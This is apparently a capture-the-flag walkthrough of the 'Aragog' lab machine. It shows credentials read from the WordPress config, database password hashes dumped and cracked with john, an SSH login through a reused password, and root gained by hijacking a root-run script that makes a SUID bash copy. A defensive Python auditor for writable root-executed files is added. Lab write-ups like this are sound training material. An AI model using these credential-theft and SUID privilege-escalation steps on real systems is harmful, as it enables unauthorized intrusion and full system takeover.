Listing the home directories: ginny and hagrid98.

www-data@Aragog:/var/www/html$ cat /opt/.backup.sh
#!/bin/bash

#cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Contents of the script: the line copying the WordPress uploads is commented out; the live line copies /bin/bash to /tmp/bash and sets the SUID/SGID bits. That only makes sense if something runs the script as root (typically a cron job; the crontab is not dumped here), and the file is owned by hagrid98, so whoever controls that account controls what root executes.

www-data@Aragog:/usr/share/wordpress$ sudo -l
bash: sudo: command not found
www-data@Aragog:/usr/share/wordpress$ ls -la /var/mail/
total 8
drwxrwsr-x 2 root mail 4096 Mar 31 2021 .
drwxr-xr-x 12 root root 4096 Mar 31 2021 ..
www-data@Aragog:/usr/share/wordpress$ ls -la /var/backups/
total 828
drwxr-xr-x 2 root root 4096 ct 3 23:32 .
drwxr-xr-x 12 root root 4096 Mar 31 2021 ..
-rw-r--r-- 1 root root 40960 Apr 1 2021 alternatives.tar.0
-rw-r--r-- 1 root root 1829 Mar 31 2021 alternatives.tar.1.gz
-rw-r--r-- 1 root root 13487 Apr 1 2021 apt.extended_states.0
-rw-r--r-- 1 root root 42 Apr 1 2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 356 Apr 1 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 166 Apr 1 2021 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 166 Apr 1 2021 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 126 Mar 31 2021 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 172 Mar 31 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 161 Mar 31 2021 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 391231 Apr 1 2021 dpkg.status.0
-rw-r--r-- 1 root root 107912 Apr 1 2021 dpkg.status.1.gz
-rw-r--r-- 1 root root 107912 Apr 1 2021 dpkg.status.2.gz
-rw-r--r-- 1 root root 107309 Mar 31 2021 dpkg.status.3.gz
-rw------- 1 root root 757 Apr 1 2021 group.bak
-rw------- 1 root shadow 630 Apr 1 2021 gshadow.bak
-rw------- 1 root root 1585 Apr 1 2021 passwd.bak
-rw------- 1 root shadow 1032 Apr 1 2021 shadow.bak
cd /tmp/tmp_wp_uploads
/bin/sh: 1: cd: can't cd to /tmp/tmp_wp_uploads

That directory does not exist; the line in the script that would create it is commented out.

cd /tmp/
www-data@Aragog:/tmp$ ls -la
total 8
drwxrwxrwt 2 root root 4096 Oct 4 03:53 .
drwxr-xr-x 18 root root 4096 Mar 31 2021 ..

/tmp is empty: there is no /tmp/bash, so the script has not produced its SUID copy yet.

www-data@Aragog:/tmp$ cd /home/ginny/
www-data@Aragog:/home/ginny$ ls -la
drwxr-xr-x 2 ginny ginny 4096 Apr 1 2021 .
drwxr-xr-x 4 root root 4096 Apr 1 2021 ..
www-data@Aragog:/home/ginny$ cd ../hagrid98/
www-data@Aragog:/home/hagrid98$ ls -la
total 28
drwxr-xr-x 3 hagrid98 hagrid98 4096 May 2 2021 .
drwxr-xr-x 4 root root 4096 Apr 1 2021 ..
-rw-r--r-- 1 hagrid98 hagrid98 220 Apr 1 2021 .bash_logout
-rw-r--r-- 1 hagrid98 hagrid98 3526 Apr 1 2021 .bashrc
drwx------ 3 hagrid98 hagrid98 4096 Apr 1 2021 .gnupg
-rw-r--r-- 1 hagrid98 hagrid98 807 Apr 1 2021 .profile
-rw-r--r-- 1 hagrid98 hagrid98 91 Apr 1 2021 horcrux1.txt

ginny's home is empty. hagrid98's home is world-readable and contains horcrux1.txt.

www-data@Aragog:/home/hagrid98$ cat horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw}

The value inside the braces is Base64 (decoded with https://www.base64decode.org/):
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

A second string of the same kind, captured during the same session:
"MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw"
2: maRvoLo GaUnt's riNg deStrOyed By haRry in chaMbEr of SeCrets
www-data@Aragog:/home/hagrid98$ uname -a
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux

That is the first flag. The kernel version is noted for completeness; we do not go down the kernel exploit route.

www-data@Aragog:/usr/share/wordpress$ cat wp-config.php
.php or /etc/wordpress/config-.php */

We look at the WordPress configuration. On Debian, /usr/share/wordpress/wp-config.php is only a stub (the fragment above is the tail of its comment); the real per-site configuration lives under /etc/wordpress/.

www-data@Aragog:/usr/share/wordpress$ cd /etc/wordpress
www-data@Aragog:/etc/wordpress$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Mar 31 2021 .
drwxr-xr-x 77 root root 4096 Oct 3 23:27 ..
-rw-r--r-- 1 root root 241 Mar 31 2021 config-default.php
-rw-r--r-- 1 root root 898 Nov 3 2020 htaccess
www-data@Aragog:/etc/wordpress$ cat config-default.php

config-default.php is world-readable and contains the database credentials, so we obtain the MySQL root password.

www-data@Aragog:/etc/wordpress$ su root
su: Authentication failure
www-data@Aragog:/etc/wordpress$ mysql -u root -p
Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 206912
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>

The password does not work for the system root account (su fails), but it logs us into MariaDB as database root.

show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
use mysql;
show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
select * from user;
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
| localhost | root | *EB39FD0B3D9B22D2B74F6D4BED097A6682A53154 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+------------------+-----------------------+---------------------------------------------------------------------+-------------+-------------+-------------+-------------+--------------+-----------+-------------+---------------+--------------+-----------+------------+-------------------+------------+------------+--------------+------------+---------------+--------------------+-------------+-----------------+------------------+------------------+--------------------+-----------------------+-----------------------+----------------+------------+--------------+--------------------------+-----------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-------------------------+------------------+---------+--------------+----------------------+
1 row in set (0.001 sec)

We dump mysql.user: a single root account with a mysql_native_password hash and full privileges.

hash-identifier
HASH: *EB39FD0B3D9B22D2B74F6D4BED097A6682A53154

Possible Hashs:
[+] MySQL 160bit - SHA-1(SHA-1($pass))

hash-identifier classifies the hash as MySQL 160-bit, i.e. SHA-1(SHA-1(password)). We already know this password from config-default.php, so there is nothing to crack here; the WordPress database is the interesting one.

MariaDB [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+---------------------------+
| Tables_in_wordpress |
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wpfm_backup |
+---------------------------+
select * from wp_users;
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
| 1 | hagrid98 | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin | hagrid98@localhost.local | | 2021-03-31 14:21:02 | | 0 | WP-Admin |
+--+----------------+-------------------------------------------+---------------+--------------------------+----------+-----------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

Dumping the WordPress users: a single account with user_login hagrid98, display name WP-Admin and nicename wp-admin (which is why wpscan showed those two names and not the real login), and a phpass hash ($P$).

┌──(pwn)─(root㉿CCat)-[~]
└─# echo '$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.' > hash
┌──(pwn)─(root㉿CCat)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 16 openMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2024-10-04 00:48) 33.33g/s 51200p/s 51200c/s 51200C/s R3v_m4lwh3r3_k1nG!!..landon
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

john cracks the hash with rockyou almost instantly: password123. Note the format: $P$ is phpass (iterated MD5, here 8192 rounds with an 8-character salt), not SHA.

┌──(pwn)─(root㉿CCat)-[~]
└─# ssh hagrid98@192.168.2.127
The authenticity of host '192.168.2.127 (192.168.2.127)' can't be established.
ED25519 key fingerprint is SHA256:oAgAxZkRbtwe40/oXGuZbaPjiDWzluKXPpTv2r6TrAs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.127' (ED25519) to the list of known hosts.
hagrid98@192.168.2.127's password:
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

hagrid98 reuses the WordPress password for the system account, so password123 logs us in over SSH.

Privilege Escalation

Privilege escalation via script hijacking

/opt/.backup.sh is owned by hagrid98, but its content (a SUID copy of bash) is only useful if root executes it, which is the weakness: as hagrid98 we can edit the script and root will run whatever we put in it. Even unmodified, once it has run, /tmp/bash -p gives a root shell.

hagrid98@Aragog:/opt$ nano .backup.sh
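The weakness exploited here, a file that root executes but a normal user owns or can replace, can be audited for generically. The Python below is an added example, not from the write-up: it walks directories whose contents are typically run as root and flags regular files that a non-root user can change or swap. The directory list is an assumption (the cron drop-in directories plus /opt, where this box keeps its script); the check functions take stat() fields so the logic can be tested without root.

```python
"""Audit root-executed script locations for files a non-root user can change.

Added example, not from the original write-up. /opt/.backup.sh on the box is
owned by hagrid98 yet does something only useful when run as root, so
whoever controls hagrid98 controls what root executes. writable_by_non_root()
and dir_allows_replacement() are pure; audit_dirs() applies them to disk.
"""
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List

# Assumption: directories whose regular files are commonly executed by root.
ROOT_EXECUTED_DIRS = [
    "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
    "/etc/cron.weekly", "/etc/cron.monthly", "/opt",
]


@dataclass
class Finding:
    path: str
    reasons: List[str]


def writable_by_non_root(st_uid: int, st_gid: int, st_mode: int) -> List[str]:
    """Reasons why someone other than root can change the file's content."""
    reasons = []
    if st_uid != 0:
        reasons.append(f"owned by uid {st_uid}, not root")
    if st_mode & stat.S_IWGRP and st_gid != 0:
        reasons.append(f"group-writable (gid {st_gid})")
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def dir_allows_replacement(d_uid: int, d_mode: int) -> bool:
    """True if a non-root user could unlink and replace files in the directory.

    A directory not owned by root, or world-writable without the sticky bit,
    lets an attacker swap the file even when the file itself is root-owned 0644.
    /tmp (1777) is excluded by the sticky-bit rule.
    """
    if d_uid != 0:
        return True
    return bool(d_mode & stat.S_IWOTH) and not bool(d_mode & stat.S_ISVTX)


def audit_dirs(dirs: Iterable[str]) -> List[Finding]:
    """Scan the given directories (non-recursively) and return all findings."""
    findings = []
    for d in dirs:
        try:
            d_st = os.lstat(d)
            names = os.listdir(d)  # includes dotfiles such as .backup.sh
        except OSError:
            continue
        for name in names:
            path = os.path.join(d, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = writable_by_non_root(st.st_uid, st.st_gid, st.st_mode)
            if dir_allows_replacement(d_st.st_uid, d_st.st_mode):
                reasons.append("parent directory allows replacing the file")
            if reasons:
                findings.append(Finding(path, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_dirs(ROOT_EXECUTED_DIRS):
        print(f.path, "->", "; ".join(f.reasons))
```

On this box the scan would report /opt/.backup.sh as "owned by uid 1000, not root" (or whatever hagrid98's uid is); extend ROOT_EXECUTED_DIRS with the script paths found in /etc/crontab and systemd timer units to cover the rest of what root runs unattended.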

Flags

cat root.txt
ANDROID{u_GOT_root_buddy}

This is the root flag.